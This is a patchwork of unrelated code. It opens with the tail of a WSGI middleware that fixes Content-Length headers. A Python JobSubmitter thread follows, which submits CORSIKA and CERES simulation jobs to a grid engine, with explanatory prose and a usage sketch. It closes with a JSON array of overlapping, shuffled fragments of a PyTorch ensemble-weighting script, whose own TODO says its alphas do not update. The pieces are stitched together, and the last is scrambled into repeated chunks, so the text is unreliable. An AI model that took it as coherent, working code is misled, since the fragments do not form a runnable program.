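                else:
                    fixed.append((name, value))
            if content_length is not None:
                fixed.append(('Content-Length', content_length))
            return start_response(status, fixed, exc_info)

        return self.app(environ, fixed_start_response)

Wrapping the Pylons application with this class at WSGI setup time would make the browser see a correct Content-Length again, which is what makes download progress bars work.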
# mopro/erna: thread that submits pending CORSIKA and CERES runs to the grid engine.
from threading import Thread, Event
import logging
import peewee
import socket

from ..database import CorsikaRun, CeresRun
from ..queries import get_pending_jobs, count_jobs, update_job_status
from .corsika import prepare_corsika_job
from .ceres import prepare_ceres_job

log = logging.getLogger(__name__)
hostname = socket.getfqdn()


class JobSubmitter(Thread):

    def __init__(
        self,
        interval,
        max_queued_jobs,
        mopro_directory,
        host,
        port,
        cluster,
        location=None,
        corsika_memory='4G',
        ceres_memory='12G',
        tmp_dir=None,
    ):
        '''
        Parameters
        ----------
        interval: int
            number of seconds to wait between submissions
        max_queued_jobs: int
            Maximum number of jobs in the queue of the grid engine.
            No new jobs are submitted if the number of jobs in the queue
            is higher than this value.
        mopro_directory: str
            path to the basic structure for erna. Logfiles, jars, xmls and
            analysis output are stored in subdirectories to this directory.
        host: str
            hostname of the submitter node
        port: int
            port for the zmq communication
        '''
        super().__init__()

        self.event = Event()
        self.interval = interval
        self.max_queued_jobs = max_queued_jobs
        self.mopro_directory = mopro_directory
        self.host = host
        self.port = port
        self.cluster = cluster
        self.location = location or hostname
        self.ceres_memory = ceres_memory
        self.corsika_memory = corsika_memory
        self.tmp_dir = tmp_dir

    def run(self):
        while not self.event.is_set():
            try:
                self.process_pending_jobs()
            except peewee.OperationalError:
                log.exception('Lost database connection')
            except Exception as e:
                log.exception('Error during submission: {}'.format(e))
            self.event.wait(self.interval)

    def terminate(self):
        self.event.set()

    def process_pending_jobs(self):
        '''
        Fetches pending runs from the processing database
        and submits them using qsub if not too many jobs are running already.
        '''
        pending_corsika = count_jobs(CorsikaRun, status='created')
        pending_ceres = count_jobs(CeresRun, status='created')
        n_queued = self.cluster.n_queued

        log.debug(f'{self.cluster.n_running} jobs running')
        log.debug(f'{n_queued} jobs queued')
        log.debug(f'{pending_corsika} pending CORSIKA jobs in database')
        log.debug(f'{pending_ceres} pending CERES jobs in database')

        new_jobs = self.max_queued_jobs - n_queued
        if new_jobs > 0:
            pending_jobs = get_pending_jobs(max_jobs=new_jobs, location=self.location)

            for job in pending_jobs:
                if self.event.is_set():
                    break

                kwargs = {
                    'mopro_directory': self.mopro_directory,
                    'submitter_host': self.host,
                    'submitter_port': self.port,
                    'tmp_dir': self.tmp_dir,
                }

                try:
                    if isinstance(job, CorsikaRun):
                        self.cluster.submit_job(
                            **prepare_corsika_job(job, **kwargs),
                            memory=self.corsika_memory,
                        )
                        log.info(f'Submitted new CORSIKA job with id {job.id}')
                    elif isinstance(job, CeresRun):
                        self.cluster.submit_job(
                            **prepare_ceres_job(job, **kwargs),
                            memory=self.ceres_memory,
                        )
                        log.info(f'Submitted new CERES job with id {job.id}')
                    else:
                        raise ValueError(f'Unknown job type: {job}')

                    update_job_status(type(job), job.id, 'queued', location=self.location)
                except Exception:
                    log.exception('Could not submit job')
                    update_job_status(type(job), job.id, 'failed')
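JobSubmitter runs as a long-lived thread: run() polls the database every interval seconds, tops the grid-engine queue up to max_queued_jobs, and terminate() sets the event so the loop exits after the current wait. Here is a minimal usage sketch, assuming only the cluster interface actually used above (submit_job(**kwargs, memory=...) plus the n_queued and n_running attributes); DummyCluster and every parameter value are illustrative, not taken from mopro.

class DummyCluster:
    """Stand-in for the real cluster object expected by JobSubmitter."""
    n_queued = 0
    n_running = 0

    def submit_job(self, memory=None, **kwargs):
        print('would submit', kwargs, 'with memory', memory)


submitter = JobSubmitter(
    interval=60,                  # poll the database once per minute
    max_queued_jobs=100,          # stop submitting once 100 jobs are queued
    mopro_directory='/path/to/mopro',
    host='submitter.example',     # where the jobs report back via zmq
    port=12700,
    cluster=DummyCluster(),
)
submitter.start()
try:
    submitter.join()
except KeyboardInterrupt:
    submitter.terminate()  # sets the event; run() exits after the current wait
    submitter.join()

Using an Event for both the shutdown flag and the sleep (event.wait(interval)) is what lets terminate() interrupt the pause immediately instead of blocking for a full interval.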
[
"args.iter criterion = nn.CrossEntropyLoss() alphas = torch.nn.Parameter(alphas) optimizer = optim.Adam([alphas], lr=args.lr, betas=(0.9, 0.999))",
"metrics to TB every 100 iterations # if i % 100 == 0:",
"4, ) loader = iter(testloader) ## Create model model_names = chpt_augm_dict[args.model] if args.use_augm",
"'frog', 'horse', 'ship', 'truck') model_dict = { 'resnet18' : ResNet18(), # 11m params",
"{ 'resnet18' : ResNet18(), # 11m params 'resnet34' : ResNet34(), # 21m 'resnet50'",
"# torch.save(state, os.path.join(checkpoint_dir, 'net_{}.pth'.format( int( i / 1000) ))) # net.train() # writer_test.add_scalar('test_acc',",
"if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params * alphas[ii] ) else: for name,",
"ResNet18(), # 11m params 'resnet34' : ResNet34(), # 21m 'resnet50' : ResNet50(), #",
"criterion, best_acc) # logging.info('=> Saving model with Loss: {:.5f} -- ACC: {} at",
"i) # # test model and save it every 5000 iterations # if",
"'dog', 'frog', 'horse', 'ship', 'truck') model_dict = { 'resnet18' : ResNet18(), # 11m",
"transform=transform_test) testloader = torch.utils.data.DataLoader( testset, # batch_size = len(testset), batch_size = 1000, shuffle",
"('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck') model_dict = {",
"inputs = inputs.to(device) # [bs, 3, 32, 32] targets = targets.to(device) # [bs]",
"logging.info('=> Accuracy improved from {} --> {} at iteration {} K'.format(best_acc, test_acc, int(i",
"torch.nn.Parameter( model_params * alphas[ii] ) else: for name, model_params in model.named_parameters(): if not",
"# if i % 100 == 0: # writer_train.add_scalar('train_acc', train_acc, i) # writer_train.add_scalar('train_loss',",
"parser.add_argument('--lr', default=1e-2, type=float, help='learning rate') parser.add_argument('--iter', default=100, type=int, help='number of total iterations to",
"58m 'vgg19' : VGG('VGG19'), } chpt_vanilla_dict = { 'resnet18': ['R18_1', 'R18_2', 'R18_3'], 'resnet50':",
"} chpt_name = 'net_80.pth' def test(model, testloader, criterion, best_acc): net.eval() test_loss = 0",
"outputs = model(inputs) loss = criterion(outputs, targets) test_loss += loss.item() _, predicted =",
"nn.CrossEntropyLoss() alphas = torch.nn.Parameter(alphas) optimizer = optim.Adam([alphas], lr=args.lr, betas=(0.9, 0.999)) ### Main optimization",
") else: for name, model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter(",
"targets) print(alphas) # print(list(model.parameters())[0][0]) optimizer.zero_grad() loss.backward() optimizer.step() print(alphas) # print(list(model.parameters())[0][0]) pdb.set_trace() # criterion",
"of experiment') parser.add_argument('--model', default='resnet18', type=str, help='model to train') parser.add_argument('--use_augm', action='store_true', help='use data augmentations?')",
"updating -- solve this issue for it in range(num_iters): # load model weights",
"= nn.CrossEntropyLoss() # optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=1e-4) # for idx in",
"# optimizer.step() # scheduler.step() # train_loss += loss.item() # _, predicted = outputs.max(1)",
"int( i / 1000)) ) # state = { # 'net' : net.state_dict(),",
"from tqdm import tqdm import os, pdb, logging, argparse import torch import torch.nn",
"100. * correct_samples / total_samples total_test_loss = test_loss / (batch_idx+1) return total_test_loss, test_acc",
"## Logging logging.basicConfig(filename=os.path.join(checkpoint_dir, 'optim.log'), level=logging.INFO) console = logging.StreamHandler() logging.getLogger().addHandler(console) console.setLevel(logging.INFO) logging.info(args) writer_test =",
"# optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=1e-4) # for idx in pbar: #",
"os.makedirs(checkpoint_dir) ## Logging logging.basicConfig(filename=os.path.join(checkpoint_dir, 'optim.log'), level=logging.INFO) console = logging.StreamHandler() logging.getLogger().addHandler(console) console.setLevel(logging.INFO) logging.info(args) writer_test",
"criterion(outputs, targets) print(alphas) # print(list(model.parameters())[0][0]) optimizer.zero_grad() loss.backward() optimizer.step() print(alphas) # print(list(model.parameters())[0][0]) pdb.set_trace() #",
"torch.nn.Parameter( model_params + alphas[ii] * checkpoint[name] ) batch = next(loader) inputs, targets =",
"lr=args.lr, momentum=0.9, weight_decay=1e-4) # for idx in pbar: # i = idx +",
"= 0, 0 with torch.no_grad(): for batch_idx, (inputs, targets) in enumerate(testloader): inputs =",
"loss = criterion(outputs, targets) # optimizer.zero_grad() # loss.backward() # optimizer.step() # scheduler.step() #",
"in enumerate(testloader): inputs = inputs.to(device) # [bs, 3, 32, 32] targets = targets.to(device)",
": ResNet34(), # 21m 'resnet50' : ResNet50(), # 23m 'resnet101': ResNet101(), # 42m",
"0: # writer_train.add_scalar('train_acc', train_acc, i) # writer_train.add_scalar('train_loss', train_loss, i) # # test model",
"transforms from models import * parser = argparse.ArgumentParser() parser.add_argument('--name', default='', type=str, help='name of",
"= 100. * correct_samples / total_samples total_test_loss = test_loss / (batch_idx+1) return total_test_loss,",
"i) # if test_acc > best_acc: # logging.info('=> Accuracy improved from {} -->",
"testloader = torch.utils.data.DataLoader( testset, # batch_size = len(testset), batch_size = 1000, shuffle =",
"transform_test = transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ]) testset =",
"= idx + args.start_iter # if i > args.iter: # print(\"TRAINING IS DONE!\")",
"'resnet18' : ResNet18(), # 11m params 'resnet34' : ResNet34(), # 21m 'resnet50' :",
"models {}'.format(num_models, args.model)) model = model_dict[args.model] model = model.to(device) model.train() ## Init alphas",
"batch_size = 1000, shuffle = False, # sampler = data_sampler(testset, shuffle=False), num_workers =",
"# inputs = inputs.to(device) # [bs, 3, 32, 32] # targets = targets.to(device)",
"type=float, help='learning rate') parser.add_argument('--iter', default=100, type=int, help='number of total iterations to run') args",
"and multiply with alphas for ii, model_name in enumerate(model_names): model_path = os.path.join('results', model_name,",
"weight as required torch.manual_seed(0) device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") classes =",
"from {} --> {} at iteration {} K'.format(best_acc, test_acc, int(i / 1000) ))",
"torch.rand(num_models) / num_models alphas[-1] = 1 - sum(alphas[:-1]) assert sum(alphas).item() == 1, 'Alphas",
"if i % 100 == 0: # writer_train.add_scalar('train_acc', train_acc, i) # writer_train.add_scalar('train_loss', train_loss,",
"# 58m 'vgg19' : VGG('VGG19'), } chpt_vanilla_dict = { 'resnet18': ['R18_1', 'R18_2', 'R18_3'],",
"{} K'.format(test_loss, test_acc, int( i / 1000)) ) # state = { #",
"0 total_samples, correct_samples = 0, 0 with torch.no_grad(): for batch_idx, (inputs, targets) in",
"'optim')) ## Data print('=> Preparing data..') transform_test = transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465),",
"model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params + alphas[ii] * checkpoint[name] )",
"'resnet101': ResNet101(), # 42m 'resnet152': ResNet152(), # 58m 'vgg19' : VGG('VGG19'), } chpt_vanilla_dict",
"= 4, ) loader = iter(testloader) ## Create model model_names = chpt_augm_dict[args.model] if",
"assert sum(alphas).item() == 1, 'Alphas should sum to 1' num_iters = args.iter criterion",
"predicted.eq(targets).sum().item() # save loss over the whole test set at TB test_acc =",
"as optim import torch.nn.functional as F import torch.backends.cudnn as cudnn from torch.utils.tensorboard import",
"= model(inputs) loss = criterion(outputs, targets) print(alphas) # print(list(model.parameters())[0][0]) optimizer.zero_grad() loss.backward() optimizer.step() print(alphas)",
"torch.save(state, os.path.join(checkpoint_dir, 'net_{}.pth'.format( int( i / 1000) ))) # net.train() # writer_test.add_scalar('test_acc', test_acc,",
"<filename>ensemble.py<gh_stars>0 from tqdm import tqdm import os, pdb, logging, argparse import torch import",
"test_loss / (batch_idx+1) return total_test_loss, test_acc def main(): checkpoint_dir = 'results_ensembles/{}'.format(args.name) if not",
"= { 'resnet18' : ResNet18(), # 11m params 'resnet34' : ResNet34(), # 21m",
"i) # writer_test.add_scalar('test_loss', test_loss, i) # if test_acc > best_acc: # logging.info('=> Accuracy",
"tqdm import tqdm import os, pdb, logging, argparse import torch import torch.nn as",
"\"cpu\") classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')",
"* alphas[ii] ) else: for name, model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params",
"= os.path.join('results', model_name, chpt_name) checkpoint = torch.load(model_path)['net'] if ii==0: model.load_state_dict(checkpoint) for name, model_params",
"logging.StreamHandler() logging.getLogger().addHandler(console) console.setLevel(logging.INFO) logging.info(args) writer_test = SummaryWriter(log_dir=os.path.join(checkpoint_dir, 'optim')) ## Data print('=> Preparing data..')",
"device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") classes = ('plane', 'car', 'bird', 'cat',",
"Logging logging.basicConfig(filename=os.path.join(checkpoint_dir, 'optim.log'), level=logging.INFO) console = logging.StreamHandler() logging.getLogger().addHandler(console) console.setLevel(logging.INFO) logging.info(args) writer_test = SummaryWriter(log_dir=os.path.join(checkpoint_dir,",
"import torch.optim as optim import torch.nn.functional as F import torch.backends.cudnn as cudnn from",
"model_dict[args.model] model = model.to(device) model.train() ## Init alphas and optimizer alphas = torch.rand(num_models)",
"name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params * alphas[ii] ) else: for name, model_params in",
"'acc' : test_acc, # 'iter' : i, # } # torch.save(state, os.path.join(checkpoint_dir, 'net_{}.pth'.format(",
"this issue for it in range(num_iters): # load model weights and multiply with",
"test_acc = 100. * correct_samples / total_samples total_test_loss = test_loss / (batch_idx+1) return",
"= 0 total_samples, correct_samples = 0, 0 with torch.no_grad(): for batch_idx, (inputs, targets)",
"os, pdb, logging, argparse import torch import torch.nn as nn import torch.optim as",
"= ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck') model_dict =",
"= { 'resnet18': ['R18_augm1', 'R18_augm2', 'R18_augm3'], 'resnet50': ['R50_augm1', 'R50_augm2', 'R50_augm3'], } chpt_name =",
"to 1' num_iters = args.iter criterion = nn.CrossEntropyLoss() alphas = torch.nn.Parameter(alphas) optimizer =",
"train_loss, i) # # test model and save it every 5000 iterations #",
"the whole test set at TB test_acc = 100. * correct_samples / total_samples",
"main(): checkpoint_dir = 'results_ensembles/{}'.format(args.name) if not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir) ## Logging logging.basicConfig(filename=os.path.join(checkpoint_dir, 'optim.log'), level=logging.INFO)",
"iteration {} K'.format(best_acc, test_acc, int(i / 1000) )) # state = { #",
"as required torch.manual_seed(0) device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") classes = ('plane',",
"and optimizer alphas = torch.rand(num_models) / num_models alphas[-1] = 1 - sum(alphas[:-1]) assert",
"21m 'resnet50' : ResNet50(), # 23m 'resnet101': ResNet101(), # 42m 'resnet152': ResNet152(), #",
"import torch.backends.cudnn as cudnn from torch.utils.tensorboard import SummaryWriter import torchvision import torchvision.transforms as",
"'resnet18': ['R18_1', 'R18_2', 'R18_3'], 'resnet50': ['R50_1', 'R50_2', 'R50_3'], } chpt_augm_dict = { 'resnet18':",
"'resnet50' : ResNet50(), # 23m 'resnet101': ResNet101(), # 42m 'resnet152': ResNet152(), # 58m",
"print('=> Preparing data..') transform_test = transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),",
"total_test_loss, test_acc def main(): checkpoint_dir = 'results_ensembles/{}'.format(args.name) if not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir) ## Logging",
"= chpt_augm_dict[args.model] if args.use_augm else chpt_vanilla_dict[args.model] num_models = len(model_names) print('=> Using {} models",
"writer_test.add_scalar('test_loss', test_loss, i) # if test_acc > best_acc: # logging.info('=> Accuracy improved from",
"{ # 'net' : net.state_dict(), # 'acc' : test_acc, # 'iter' : i,",
"{}'.format(num_models, args.model)) model = model_dict[args.model] model = model.to(device) model.train() ## Init alphas and",
"= torch.load(model_path)['net'] if ii==0: model.load_state_dict(checkpoint) for name, model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'):",
"as cudnn from torch.utils.tensorboard import SummaryWriter import torchvision import torchvision.transforms as transforms from",
"Init alphas and optimizer alphas = torch.rand(num_models) / num_models alphas[-1] = 1 -",
"model(inputs) loss = criterion(outputs, targets) test_loss += loss.item() _, predicted = outputs.max(1) total_samples",
"pbar: # i = idx + args.start_iter # if i > args.iter: #",
"to train') parser.add_argument('--use_augm', action='store_true', help='use data augmentations?') parser.add_argument('--lr', default=1e-2, type=float, help='learning rate') parser.add_argument('--iter',",
"} chpt_augm_dict = { 'resnet18': ['R18_augm1', 'R18_augm2', 'R18_augm3'], 'resnet50': ['R50_augm1', 'R50_augm2', 'R50_augm3'], }",
"alphas are not updating -- solve this issue for it in range(num_iters): #",
"to run') args = parser.parse_args() # use this to init weight as required",
"torch import torch.nn as nn import torch.optim as optim import torch.nn.functional as F",
"if args.use_augm else chpt_vanilla_dict[args.model] num_models = len(model_names) print('=> Using {} models {}'.format(num_models, args.model))",
"shuffle=False), num_workers = 4, ) loader = iter(testloader) ## Create model model_names =",
"# # log metrics to TB every 100 iterations # if i %",
"model_name, chpt_name) checkpoint = torch.load(model_path)['net'] if ii==0: model.load_state_dict(checkpoint) for name, model_params in model.named_parameters():",
"os.path.join('results', model_name, chpt_name) checkpoint = torch.load(model_path)['net'] if ii==0: model.load_state_dict(checkpoint) for name, model_params in",
"} chpt_vanilla_dict = { 'resnet18': ['R18_1', 'R18_2', 'R18_3'], 'resnet50': ['R50_1', 'R50_2', 'R50_3'], }",
"1000, shuffle = False, # sampler = data_sampler(testset, shuffle=False), num_workers = 4, )",
"# load model weights and multiply with alphas for ii, model_name in enumerate(model_names):",
"# _, predicted = outputs.max(1) # total_samples += targets.size(0) # correct_samples += predicted.eq(targets).sum().item()",
"= 1000, shuffle = False, # sampler = data_sampler(testset, shuffle=False), num_workers = 4,",
"import torchvision import torchvision.transforms as transforms from models import * parser = argparse.ArgumentParser()",
"{:.5f} -- ACC: {} at iteration {} K'.format(test_loss, test_acc, int( i / 1000))",
"# writer_train.add_scalar('train_loss', train_loss, i) # # test model and save it every 5000",
"= test_loss / (batch_idx+1) return total_test_loss, test_acc def main(): checkpoint_dir = 'results_ensembles/{}'.format(args.name) if",
"+= targets.size(0) # correct_samples += predicted.eq(targets).sum().item() # train_acc = correct_samples / total_samples #",
"transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ]) testset = torchvision.datasets.CIFAR10(root='data', train=False, download=True, transform=transform_test)",
"import tqdm import os, pdb, logging, argparse import torch import torch.nn as nn",
"int( i / 1000) ))) # net.train() # writer_test.add_scalar('test_acc', test_acc, i) # writer_test.add_scalar('test_loss',",
"SummaryWriter(log_dir=os.path.join(checkpoint_dir, 'optim')) ## Data print('=> Preparing data..') transform_test = transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822,",
"targets.to(device) # [bs] outputs = model(inputs) loss = criterion(outputs, targets) test_loss += loss.item()",
"= targets.to(device) # [bs] outputs = model(inputs) loss = criterion(outputs, targets) test_loss +=",
"== 0: # test_loss, test_acc = test(net, testloader, criterion, best_acc) # logging.info('=> Saving",
"(inputs, targets) in enumerate(testloader): inputs = inputs.to(device) # [bs, 3, 32, 32] targets",
"model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params * alphas[ii] )",
"not updating -- solve this issue for it in range(num_iters): # load model",
"/ 1000)) ) # state = { # 'net' : net.state_dict(), # 'acc'",
": test_acc, # 'iter' : i, # } # torch.save(state, os.path.join(checkpoint_dir, 'net_best.pth')) #",
"model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params * alphas[ii] ) else: for",
"# train_loss += loss.item() # _, predicted = outputs.max(1) # total_samples += targets.size(0)",
"# break # train_loss = 0 # total_samples, correct_samples = 0, 0 #",
"next(loader) inputs, targets = batch inputs = inputs.to(device) targets = targets.to(device) outputs =",
"optim.Adam([alphas], lr=args.lr, betas=(0.9, 0.999)) ### Main optimization loop ## TODO: alphas are not",
"32, 32] # targets = targets.to(device) # [bs] # outputs = net(inputs) #",
"optimizer alphas = torch.rand(num_models) / num_models alphas[-1] = 1 - sum(alphas[:-1]) assert sum(alphas).item()",
"argparse.ArgumentParser() parser.add_argument('--name', default='', type=str, help='name of experiment') parser.add_argument('--model', default='resnet18', type=str, help='model to train')",
"chpt_augm_dict[args.model] if args.use_augm else chpt_vanilla_dict[args.model] num_models = len(model_names) print('=> Using {} models {}'.format(num_models,",
"# log metrics to TB every 100 iterations # if i % 100",
"num_models alphas[-1] = 1 - sum(alphas[:-1]) assert sum(alphas).item() == 1, 'Alphas should sum",
"import torch.nn.functional as F import torch.backends.cudnn as cudnn from torch.utils.tensorboard import SummaryWriter import",
"= transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ]) testset = torchvision.datasets.CIFAR10(root='data',",
"* checkpoint[name] ) batch = next(loader) inputs, targets = batch inputs = inputs.to(device)",
"== 1, 'Alphas should sum to 1' num_iters = args.iter criterion = nn.CrossEntropyLoss()",
"= model_dict[args.model] model = model.to(device) model.train() ## Init alphas and optimizer alphas =",
"args.use_augm else chpt_vanilla_dict[args.model] num_models = len(model_names) print('=> Using {} models {}'.format(num_models, args.model)) model",
"name, model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params * alphas[ii]",
"'R50_3'], } chpt_augm_dict = { 'resnet18': ['R18_augm1', 'R18_augm2', 'R18_augm3'], 'resnet50': ['R50_augm1', 'R50_augm2', 'R50_augm3'],",
"console.setLevel(logging.INFO) logging.info(args) writer_test = SummaryWriter(log_dir=os.path.join(checkpoint_dir, 'optim')) ## Data print('=> Preparing data..') transform_test =",
"model.load_state_dict(checkpoint) for name, model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params",
"torch.nn as nn import torch.optim as optim import torch.nn.functional as F import torch.backends.cudnn",
"100 iterations # if i % 100 == 0: # writer_train.add_scalar('train_acc', train_acc, i)",
"0: # test_loss, test_acc = test(net, testloader, criterion, best_acc) # logging.info('=> Saving model",
"with Loss: {:.5f} -- ACC: {} at iteration {} K'.format(test_loss, test_acc, int( i",
"return total_test_loss, test_acc def main(): checkpoint_dir = 'results_ensembles/{}'.format(args.name) if not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir) ##",
"'iter' : i, # } # torch.save(state, os.path.join(checkpoint_dir, 'net_best.pth')) # best_acc = test_acc",
"# [bs] outputs = model(inputs) loss = criterion(outputs, targets) test_loss += loss.item() _,",
"iterations to run') args = parser.parse_args() # use this to init weight as",
"# 21m 'resnet50' : ResNet50(), # 23m 'resnet101': ResNet101(), # 42m 'resnet152': ResNet152(),",
"in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params + alphas[ii] * checkpoint[name]",
"optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=1e-4) # for idx in pbar: # i = idx",
"if i > args.iter: # print(\"TRAINING IS DONE!\") # break # train_loss =",
"writer_train.add_scalar('train_acc', train_acc, i) # writer_train.add_scalar('train_loss', train_loss, i) # # test model and save",
"inputs.to(device) # [bs, 3, 32, 32] # targets = targets.to(device) # [bs] #",
"test set at TB test_acc = 100. * correct_samples / total_samples total_test_loss =",
"# state = { # 'net' : net.state_dict(), # 'acc' : test_acc, #",
"outputs = net(inputs) # loss = criterion(outputs, targets) # optimizer.zero_grad() # loss.backward() #",
"* parser = argparse.ArgumentParser() parser.add_argument('--name', default='', type=str, help='name of experiment') parser.add_argument('--model', default='resnet18', type=str,",
"outputs.max(1) # total_samples += targets.size(0) # correct_samples += predicted.eq(targets).sum().item() # train_acc = correct_samples",
"Saving model with Loss: {:.5f} -- ACC: {} at iteration {} K'.format(test_loss, test_acc,",
"3, 32, 32] targets = targets.to(device) # [bs] outputs = model(inputs) loss =",
"betas=(0.9, 0.999)) ### Main optimization loop ## TODO: alphas are not updating --",
"to TB every 100 iterations # if i % 100 == 0: #",
"enumerate(model_names): model_path = os.path.join('results', model_name, chpt_name) checkpoint = torch.load(model_path)['net'] if ii==0: model.load_state_dict(checkpoint) for",
"5000 iterations # if i % args.iter_save == 0: # test_loss, test_acc =",
"iterations # if i % args.iter_save == 0: # test_loss, test_acc = test(net,",
"> best_acc: # logging.info('=> Accuracy improved from {} --> {} at iteration {}",
"100 == 0: # writer_train.add_scalar('train_acc', train_acc, i) # writer_train.add_scalar('train_loss', train_loss, i) # #",
"train_loss += loss.item() # _, predicted = outputs.max(1) # total_samples += targets.size(0) #",
"best_acc) # logging.info('=> Saving model with Loss: {:.5f} -- ACC: {} at iteration",
"as nn import torch.optim as optim import torch.nn.functional as F import torch.backends.cudnn as",
"num_workers = 4, ) loader = iter(testloader) ## Create model model_names = chpt_augm_dict[args.model]",
"/ 1000) )) # state = { # 'net' : net.state_dict(), # 'acc'",
"i = idx + args.start_iter # if i > args.iter: # print(\"TRAINING IS",
"# 'net' : net.state_dict(), # 'acc' : test_acc, # 'iter' : i, #",
"{} --> {} at iteration {} K'.format(best_acc, test_acc, int(i / 1000) )) #",
"net.eval() test_loss = 0 total_samples, correct_samples = 0, 0 with torch.no_grad(): for batch_idx,",
"[bs] # outputs = net(inputs) # loss = criterion(outputs, targets) # optimizer.zero_grad() #",
"alphas for ii, model_name in enumerate(model_names): model_path = os.path.join('results', model_name, chpt_name) checkpoint =",
"# writer_test.add_scalar('test_loss', test_loss, i) # if test_acc > best_acc: # logging.info('=> Accuracy improved",
"['R50_1', 'R50_2', 'R50_3'], } chpt_augm_dict = { 'resnet18': ['R18_augm1', 'R18_augm2', 'R18_augm3'], 'resnet50': ['R50_augm1',",
"default='resnet18', type=str, help='model to train') parser.add_argument('--use_augm', action='store_true', help='use data augmentations?') parser.add_argument('--lr', default=1e-2, type=float,",
"train_acc = correct_samples / total_samples # # log metrics to TB every 100",
"test_loss += loss.item() _, predicted = outputs.max(1) total_samples += targets.size(0) correct_samples += predicted.eq(targets).sum().item()",
"chpt_name = 'net_80.pth' def test(model, testloader, criterion, best_acc): net.eval() test_loss = 0 total_samples,",
"best_acc: # logging.info('=> Accuracy improved from {} --> {} at iteration {} K'.format(best_acc,",
"not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params * alphas[ii] ) else: for name, model_params",
"pdb.set_trace() # criterion = nn.CrossEntropyLoss() # optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=1e-4) #",
"# correct_samples += predicted.eq(targets).sum().item() # train_acc = correct_samples / total_samples # # log",
"train=False, download=True, transform=transform_test) testloader = torch.utils.data.DataLoader( testset, # batch_size = len(testset), batch_size =",
"chpt_name) checkpoint = torch.load(model_path)['net'] if ii==0: model.load_state_dict(checkpoint) for name, model_params in model.named_parameters(): if",
"criterion(outputs, targets) test_loss += loss.item() _, predicted = outputs.max(1) total_samples += targets.size(0) correct_samples",
"batch_idx, (inputs, targets) in enumerate(testloader): inputs = inputs.to(device) # [bs, 3, 32, 32]",
"import * parser = argparse.ArgumentParser() parser.add_argument('--name', default='', type=str, help='name of experiment') parser.add_argument('--model', default='resnet18',",
"for name, model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params *",
"as F import torch.backends.cudnn as cudnn from torch.utils.tensorboard import SummaryWriter import torchvision import",
"action='store_true', help='use data augmentations?') parser.add_argument('--lr', default=1e-2, type=float, help='learning rate') parser.add_argument('--iter', default=100, type=int, help='number",
"torch.cuda.is_available() else \"cpu\") classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse',",
"inputs, targets = batch # inputs = inputs.to(device) # [bs, 3, 32, 32]",
"# total_samples, correct_samples = 0, 0 # batch = next(loader) # inputs, targets",
"test_acc, # 'iter' : i, # } # torch.save(state, os.path.join(checkpoint_dir, 'net_{}.pth'.format( int( i",
"load model weights and multiply with alphas for ii, model_name in enumerate(model_names): model_path",
"{} models {}'.format(num_models, args.model)) model = model_dict[args.model] model = model.to(device) model.train() ## Init",
"total_samples += targets.size(0) # correct_samples += predicted.eq(targets).sum().item() # train_acc = correct_samples / total_samples",
"0, 0 # batch = next(loader) # inputs, targets = batch # inputs",
"for it in range(num_iters): # load model weights and multiply with alphas for",
"predicted.eq(targets).sum().item() # train_acc = correct_samples / total_samples # # log metrics to TB",
"_, predicted = outputs.max(1) total_samples += targets.size(0) correct_samples += predicted.eq(targets).sum().item() # save loss",
"loss.backward() # optimizer.step() # scheduler.step() # train_loss += loss.item() # _, predicted =",
"download=True, transform=transform_test) testloader = torch.utils.data.DataLoader( testset, # batch_size = len(testset), batch_size = 1000,",
"correct_samples += predicted.eq(targets).sum().item() # save loss over the whole test set at TB",
"[bs] outputs = model(inputs) loss = criterion(outputs, targets) test_loss += loss.item() _, predicted",
"data_sampler(testset, shuffle=False), num_workers = 4, ) loader = iter(testloader) ## Create model model_names",
"train_loss = 0 # total_samples, correct_samples = 0, 0 # batch = next(loader)",
"= 0, 0 # batch = next(loader) # inputs, targets = batch #",
"next(loader) # inputs, targets = batch # inputs = inputs.to(device) # [bs, 3,",
"# outputs = net(inputs) # loss = criterion(outputs, targets) # optimizer.zero_grad() # loss.backward()",
